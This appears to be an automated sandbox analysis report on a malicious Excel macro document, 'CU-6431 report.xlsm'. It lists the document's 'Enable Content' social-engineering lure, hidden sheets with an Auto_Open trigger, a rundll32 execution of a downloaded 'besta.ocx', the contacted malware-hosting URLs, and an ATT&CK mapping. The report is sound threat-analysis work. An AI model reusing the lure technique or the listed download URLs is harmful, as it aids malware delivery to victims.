    Source: Screenshot number: 8; Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing, please click "Enable Content
    Source: Screenshot number: 8; Screenshot OCR: protected documents 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing
    Source: Screenshot number: 8; Screenshot OCR: Enable Content" button 6 7 ' O 9 10 11 12 13 14 15 16 1'7 N , O , P , Q , R , S T U V
    Source: Document image extraction number: 0; Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 0; Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 0; Screenshot OCR: Enable Content" button
    Source: Document image extraction number: 1; Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content'
    Source: Document image extraction number: 1; Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 1; Screenshot OCR: Enable Content' button
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: Buk2
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: Buk5
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: Buk1
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: Buk7
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: EFEWF
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: Buk3
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: Buk4
    Source: CU-6431 report.xlsm; Macro extractor: Sheet name: Buk6
    Source: workbook.xml; Binary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{8197EE46-A436-4D64-BA91-0FA619A1F240}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: EA155E99.tmp.1.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: CU-6431 report.xlsm; Virustotal: Detection: 30%
    Source: CU-6431 report.xlsm; ReversingLabs: Detection: 20%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4828778935
    Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\Desktop\~$CU-6431 report.xlsm
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{73545105-289A-4285-8C71-F341B9E6A3D0} - OProcSessId.dat
    Source: classification engine; Classification label: mal68.expl.winXLSM@4/7@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe; Automated click: OK
    Source: C:\Windows\System32\BackgroundTransferHost.exe; Automated click: OK
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: CU-6431 report.xlsm; Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: CU-6431 report.xlsm; Initial sample: OLE zip file path = xl/media/image1.png
    Source: CU-6431 report.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: CU-6431 report.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: CU-6431 report.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: CU-6431 report.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: CU-6431 report.xlsm; Initial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: EA155E99.tmp.1.dr; Initial sample: OLE indicators vbamacros = False
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; Code function: 1_3_0F63B7C4 sldt word ptr [eax]; 1_3_0F63B7C4
    Source: EXCEL.EXE, 00000001.00000003.382894979.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577078364.000000000D900000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433700627.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420525101.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577966844.000000000F68D000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000001.00000003.382894979.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433700627.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420525101.000000000F68D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577966844.000000000F68D000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000001.00000003.439000776.0000000012E9E000.00000004.00000001.sdmp; Binary or memory string: hJ2oKAy8cULD4mZTt5Qocx2uhequnX4mNxDjUY8j64ciLpywHhTZibYsGPurHLpKlTSPvMNetW9Z
    Source: Yara match; File source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmp; Binary or memory string: Program Manager
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmp; Binary or memory string: Progman
    Source: EXCEL.EXE, 00000001.00000002.575809824.0000000002F90000.00000002.00020000.sdmp; Binary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting 1 | Path Interception | Process Injection 2 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Exploitation for Client Execution 23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 2 | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 1 | LSA Secrets | System Information Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label | Link
    CU-6431 report.xlsm | 31% | Virustotal | | Browse
    CU-6431 report.xlsm | 20% | ReversingLabs | Document-Office.Downloader.EncDoc |

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs


    Domains and IPs

    Contacted Domains

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    standoutglobal.com | 162.240.9.126 | true | false | | unknown
    vendes.marketing | 107.180.46.229 | true | false | | unknown

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://vendes.marketing/transmigrant/Wplzr/ | false | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries
                                                                        high
                                                                        https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://login.windows.net/common/oauth2/authorizeQEXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://clients.config.office.net/user/v1.0/android/policies72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                            high
                                                                            https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://login.windows.net/common/oauth2/authorizeUEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oauEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://login.windows.net/common/oauth2/authorizeVEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://login.windows.net/common/oauth2/authorizeWEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://schemas.microEXCEL.EXE, 00000001.00000003.280878153.0000000013072000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.280700035.0000000013072000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                      high
                                                                                      https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-consbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://login.windows.net/common/oauth2/authorizeOEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://login.windows.net/common/oauth2/authorizeCEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsmUEXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://login.windows.net/common/oauth2/authorizeDEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                              high
                                                                                              https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.cEXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://login.windows.net/common/oauth2/authorizeEEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://login.windows.net/common/oauth2/authorizeGEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://login.windows.net/common/oauth2/authorize=EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://login.windows.net/common/oauth2/authorize0EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://login.windows.net/common/oauth2/authorize1EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://login.windows.net/common/oauth2/authorize2EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);srcbesta.ocx.1.dr, BX1IWYL9.htm.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://login.windows.net/common/oauth2/authorize3EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://devnull.onenote.com72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                  high
                                                                                                                  https://login.windows.net/common/oauth2/authorize6EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://login.windows.net/common/oauth2/authorize-EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://login.windows.net/common/oauth2/authorize.EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingEXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                          high
                                                                                                                          https://skyapi.live.net/Activity/EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech/FEXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1024x348.pngBX1IWYL9.htm.1.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://api.cortana.ai72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown

                                                                                                                            Contacted IPs

                                                                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.240.9.126 | standoutglobal.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
107.180.46.229 | vendes.marketing | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false

                                                                                                                            General Information

                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                            Analysis ID:532531
                                                                                                                            Start date:02.12.2021
                                                                                                                            Start time:11:34:25
                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                            Overall analysis duration:0h 6m 10s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Sample file name:CU-6431 report.xlsm
                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                            Number of analysed new started processes analysed:26
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • HDC enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal68.expl.winXLSM@4/7@2/2
                                                                                                                            EGA Information:Failed
                                                                                                                            HDC Information:Failed
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 0
                                                                                                                            • Number of non-executed functions: 1
                                                                                                                            Cookbook Comments:
                                                                                                                            • Adjust boot time
                                                                                                                            • Enable AMSI
                                                                                                                            • Found application associated with file extension: .xlsm
                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                            • Attach to Office via COM
                                                                                                                            • Scroll down
                                                                                                                            • Close Viewer
                                                                                                                            Warnings:
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.12.233, 52.109.12.22, 52.109.8.25
                                                                                                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, us.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                            • Execution Graph export aborted for target EXCEL.EXE, PID 7136 because there are no executed function
                                                                                                                            • Not all processes where analyzed, report is missing behavior information

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            No simulations

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

Match | Associated Sample Name / URL | Detection | Context
162.240.9.126 | CU-6431 report.xlsm | malicious | standoutglobal.com/2/MWpqeVgZ/
 | SCAN_7295943480515097.xlsm | malicious | standoutglobal.com/2/MWpqeVgZ/
107.180.46.229 | CU-6431 report.xlsm | malicious | vendes.marketing/transmigrant/Wplzr/
 | SCAN_7295943480515097.xlsm | malicious | vendes.marketing/transmigrant/Wplzr/
 | SCAN_7295943480515097.xlsm | malicious | vendes.marketing/transmigrant/Wplzr/
 | Purchase Inquiry&Product Specification.exe | malicious | www.nihongo.school/cu6s/?u6utf=W50CE7q4q9oP7gRqIAd9YQ9RaMYKauZAxq11Ezs86ZRrs4WUxbwZ3395pe/S2qg7huHC&9rN46F=xVMHGdB8

                                                                                                                            Domains

Match | Associated Sample Name / URL | Detection | Context
vendes.marketing | CU-6431 report.xlsm | malicious | 107.180.46.229
 | SCAN_7295943480515097.xlsm | malicious | 107.180.46.229
 | SCAN_7295943480515097.xlsm | malicious | 107.180.46.229
standoutglobal.com | SCAN_7295943480515097.xlsm | malicious | 162.240.9.126
 | SCAN_7295943480515097.xlsm | malicious | 162.240.9.126

                                                                                                                            ASN


                                                                                                                            JA3 Fingerprints


                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\72CBFE55-51D8-483F-AB8D-10F17659EA7C
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):140352
                                                                                                                            Entropy (8bit):5.35745935500725
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:zcQIfgxrBdA3gBwtnQ9DQW+zUb4Ff7nXmvid1XiE6LWmE9:puQ9DQW+zfXfH
                                                                                                                            MD5:289D3310A81DF95B3FB249A22A5979E8
                                                                                                                            SHA1:524AD470682AB5844A76FA682787A3CE4E687C04
                                                                                                                            SHA-256:9860E12150278A279979678927363EAACD890100CE69CFE6FD6C9D9076FE1102
                                                                                                                            SHA-512:C20D225DEFDF6A377621432CF316E7F458CEC88668ED31BD045FFA05092BFE19781CAA3B1F1ADD26F959EC073FF0607BD3C414E50B18BACB61195DE91AE5AA09
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T10:35:17">.. Build: 16.0.14729.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EA155E99.tmp
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1536
                                                                                                                            Entropy (8bit):1.1464700112623651
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                            MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                            SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                            SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                            SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                            Malicious:false
                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FF60AF8.png
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
